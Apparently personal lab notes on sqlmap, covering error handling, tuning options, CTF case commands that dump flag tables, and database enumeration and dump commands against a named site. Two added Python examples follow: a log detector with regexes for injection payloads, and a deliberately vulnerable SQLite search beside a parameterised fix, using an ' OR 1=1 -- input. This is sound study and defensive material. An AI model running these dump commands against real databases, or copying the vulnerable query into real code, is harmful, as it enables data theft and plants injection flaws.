SQLMap
Handling SQLMap Errors
We can use --parse-errors to parse and display the DBMS error messages returned in the responses.
-t <file> stores the whole HTTP traffic to an output file.
-v gives verbose output; it takes a number for the verbosity level.
--proxy lets us send the traffic through a proxy.
Attack Tuning
We can use --prefix and --suffix to add text before and after each injected payload, like the following example:
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
--level goes from 1 to 5, with the default being 1. The higher the level, the more tests are included that are less likely to succeed. So by default SQLMap tries the most likely attack vectors, but you can extend it to include less likely ones.
--risk goes from 1 to 3, with the default being 1. It extends the risk of causing problems on the target side, i.e. the risk of DB entry loss or denial of service.
You can check what these add by running with -v 3 or higher to see the values used in the payloads.
It is generally not encouraged to increase these because it increases the run time significantly, but you might have to for login pages or ones where an OR-based payload is needed.
--code can be used to detect differences based on the HTTP status code, for example --code=400.
--titles can look for the subtle difference in the changing of the <title> tag.
--string can look for a specific string in the response, such as --string=success.
--text-only will remove all HTML tags and only compare the text.
--technique allows us to specify the SQLi technique(s) we want to use. For example, --technique=BEU will only try boolean-based blind, error-based, and union-based.
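Defender-side added example, not from these notes or from the sqlmap project: a small Python detector that reads constructed Apache combined-format access log lines and flags the request families the options above produce (a sqlmap User-Agent, and boolean-based, union-based, time-based and stacked payloads found in the decoded query string). The log lines, IPs, timestamps and the User-Agent version are constructed sample data, and the regexes are illustrative heuristics, not sqlmap's own payload list.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed Apache combined-format access log lines (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?q=test HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /?q=test%27%29%29%20AND%201%3D1--%20- HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:55:39 +0000] "GET /?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=summer%20sale HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [ts] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Heuristic signatures for the payload families sqlmap's techniques produce
# (boolean-based blind, union-based, time-based blind, stacked queries).
# Illustrative patterns chosen for this example, not sqlmap's own list.
PAYLOAD_RES = {
    "boolean": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "union": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "time": re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I),
    "stacked": re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I),
}


def decode_params(path):
    """Return the decoded query string plus every decoded parameter value,
    so payloads are inspected after URL decoding (where %27 becomes ')."""
    parsed = urlparse(path)
    values = [unquote_plus(parsed.query)]
    for vals in parse_qs(parsed.query, keep_blank_values=True).values():
        values.extend(vals)
    return values


def analyze_line(line):
    """Parse one log line; return a finding dict if it looks like sqlmap
    activity (by User-Agent or by payload), otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = set()
    if "sqlmap" in m["ua"].lower():
        reasons.add("user-agent:sqlmap")
    for value in decode_params(m["path"]):
        for name, rx in PAYLOAD_RES.items():
            if rx.search(value):
                reasons.add(f"payload:{name}")
    if not reasons:
        return None
    return {"ip": m["ip"], "status": int(m["status"]),
            "path": m["path"], "reasons": sorted(reasons)}


def scan(log_text):
    """Run analyze_line over a whole log and keep only the findings."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


def hits_per_ip(findings):
    """Aggregate findings by source IP: sqlmap sends many probes per client,
    so a count per IP is a better alert key than a single line."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["path"], ",".join(f["reasons"]))
    print(hits_per_ip(found))
```

The User-Agent check is the cheapest signal but the easiest to lose (sqlmap can be told to send a browser User-Agent), so the payload regexes on decoded parameter values carry most of the weight; the per-IP count is what you would actually alert on, since a scan produces dozens of probes from one client.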
found the flag by modding the queries from yesterday
Case 5:
sqlmap -r Case5.txt --threads 10 --dump -T flag5 --batch --level=3 --risk=3
Case 6: non standard columns
sqlmap -r Case6.txt --threads 10 --dump -T flag6 --batch --prefix='`)'
Note: no way in hell would I have found this without the hint
Case 7: union cols
sqlmap -r Case7.txt --threads 10 --dump -T flag7 --batch --union-cols=5
Note: Hint said to count the cols so I did and added the tag. Still would have never tried this blindly
Database Enumeration
Basic Database Data Enumeration
--banner will give us the database version banner
--current-user will retrieve the current database user
--current-db will tell us the current database
--is-dba will check if the current user has DBA rights
--tables -D databasename will retrieve all the tables of a database
if we want to retrieve data from a DB we can use --dump
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump -T users -D exampleDatabase
The above sqlmap command will dump all the data from the table users in exampleDatabase.
If we want to only grab certain columns then we can do the following command:
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump -T users -D exampleDB -C name,surname
To do the above but grab rows by their ordinal numbers (row positions) we can do the following:
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump -T users -D exampleDB --start=2 --stop=3
We can do a conditional enumeration, essentially a WHERE clause, by doing the following:
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump -T users -D exampleDB --where="name LIKE 'f%'"
The above will look for all users whose name begins with an f.
If you want to dump all the contents of a DB you can do the following:
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump -D exampleDatabase
Or if we want to grab data from all databases we can do the following:
sqlmap -u "http://www.galapagh0st.com/?id=1" --dump-all --exclude-sysdbs
Note: --exclude-sysdbs will skip the DBMS system databases.
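Added example, not from these notes or from sqlmap: the application bug that --dump and --where rely on, shown in Python against an in-memory SQLite table with constructed rows. The vulnerable search pastes the user's text into a LIKE clause by string formatting, so a quoted input rewrites the WHERE and returns the whole table; the hardened version binds the value as a query parameter and escapes the LIKE wildcards, so neither a quote nor a bare % can widen the query. Table and column names (users, name, surname) are taken from the commands above; the rows are made up.

```python
import sqlite3


def make_db():
    """In-memory SQLite table with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, surname TEXT)")
    conn.executemany(
        "INSERT INTO users (name, surname) VALUES (?, ?)",
        [("frank", "adams"), ("fiona", "baker"), ("greg", "clark")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, prefix):
    """Vulnerable: the user's text becomes part of the SQL grammar, so a quote
    followed by OR / UNION / a comment rewrites the WHERE clause. This is the
    kind of query sqlmap's --where and --dump options drive."""
    sql = f"SELECT name, surname FROM users WHERE name LIKE '{prefix}%' ORDER BY id"
    return conn.execute(sql).fetchall()


def escape_like(text, esc="\\"):
    """Escape the LIKE metacharacters (% and _) and the escape char itself,
    so the user's input is matched literally inside the pattern."""
    return (text.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_safe(conn, prefix):
    """Hardened: the value is bound as a parameter (never part of the SQL text)
    and LIKE wildcards are escaped, so the caller controls only the prefix."""
    sql = "SELECT name, surname FROM users WHERE name LIKE ? ESCAPE '\\' ORDER BY id"
    return conn.execute(sql, (escape_like(prefix) + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"  # constructed input: closes the quote, adds a tautology, comments out the rest
    print("vulnerable, prefix f :", search_vulnerable(db, "f"))
    print("vulnerable, injected :", search_vulnerable(db, payload))
    print("safe, prefix f       :", search_safe(db, "f"))
    print("safe, injected       :", search_safe(db, payload))
    print("safe, wildcard input :", search_safe(db, "%"))
```

Parameter binding alone closes the injection; the ESCAPE handling is the extra step people forget for LIKE, because a parameterised pattern of "%" still matches every row. The same idea applies to the --is-dba check above from the other side: the account the application connects with should not have DBA rights, so that even an exploited query cannot reach other databases or the file system.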